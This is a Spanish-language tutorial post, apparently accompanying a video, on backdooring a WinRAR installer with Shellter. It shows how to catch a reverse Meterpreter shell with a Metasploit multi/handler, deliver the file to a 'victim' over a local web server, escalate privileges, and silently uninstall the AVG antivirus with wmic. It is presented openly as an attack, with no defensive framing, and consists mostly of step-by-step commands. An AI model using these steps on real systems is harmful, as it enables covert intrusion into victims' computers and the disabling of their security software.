HACER BYPASS Y DESINSTALAR ANTIVIRUS DESDE KALI LINUX 2.0

Hace unas horas he publicado un video sobre usar un bypass pero este método lo he combinado y me ha gustado porque elimina totalmente el antivirus sin que el usuario sé cuenta.

En este video explicamos una parte sobre algunas herramientas que usamos
AQUI Y AQUI
Esta combinación de estas herramienta formamos un trió cibernetico.

Vamos a usar el software de “WRAR.EXE” en el cual lo inyectamos con shellter para poner ejecutarlo también por msfconsole.

 cd Downloads/shellter

Lo ejecutamos

 wine shellter

Los siguientes paso sigan leyendo en el post que le deje arriba.
Ahora usaremos msfconsole.

service postgresql start
 msfconsole

Ahora comandamos a un exploit.

use exploit/multi/handler

Para ver los detalles

show options

Ahora nos pide la IP Y PUERTO

 set LHOST IP
set LPORT 8080

Ahora vamos a usar el meterpreter para windows. En el cual usaremos el mismo que usamos con shellter.

 set PAYLOAD windows/meterpreter/reverse_tcp

Ahora para ejecutarlo

exploit -j

En el cual enviamos a la victima el software o archivo “wrar.exe” en mi caso lo hare por la misma red usando SimpleHTTPServer.
Cuando la victima intente instalar el programa de winrar, aparte de instalar winrar va a instalar el exploit programado.Active sessions

sessions -i 1

Para saber datos del sistema.

 sysinfo

Vemos datos de los programas.

 ps
getsystem
getuid

Estos comandos fueron para obtener información más complejo del sistema antes de ejecutar nuestra shell.

shell

Ahora aquí viene lo bueno
VAMOS A DESINSTALAR EL ANTIVIRUS O ALGÚN PROGRAMA QUE QUERAMOS.

wmic product get name

Vemos solo los nombres de los software instalado en el sistema.

wmic product where name="AVG" call uninstall /nointeractive

Lo que hacemos es dejar que el programa no se ejecute y poder desinstalarlo.
Espero que te guste y compártelo con tus amigos.